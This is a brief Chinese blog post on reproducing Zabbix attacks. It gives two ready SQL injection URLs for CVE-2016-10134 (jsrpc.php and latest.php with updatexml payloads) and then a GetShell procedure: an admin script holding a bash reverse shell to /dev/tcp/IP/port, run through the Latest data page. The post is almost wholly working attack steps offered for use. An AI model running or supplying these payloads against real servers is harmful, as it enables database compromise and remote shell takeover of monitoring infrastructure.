Zabbix

1.漏洞复现

CVE-2016-10134 SQL注入

影响范围:Zabbix 2.2.x、3.0.0 - 3.0.3

漏洞页面1:

GET请求进行SQL注入,/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

漏洞页面2:

登录(可能可以以Guest登录),GET请求进行SQL注入,/latest.php?output=ajax&sid=Cookie的zbx_sessionid后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

GetShell

zabbix_agentd.conf配置了EnableRemoteCommands=1

以管理员登录,Administration->Scripts->Create script->名称随意、内容bash -i >& /dev/tcp/IP/端口 0>&1->add

Monitoring->Latest data->找到脚本执行

posted @ 2023-01-17 01:15  Hacker&Cat  阅读(36)  评论(0编辑  收藏  举报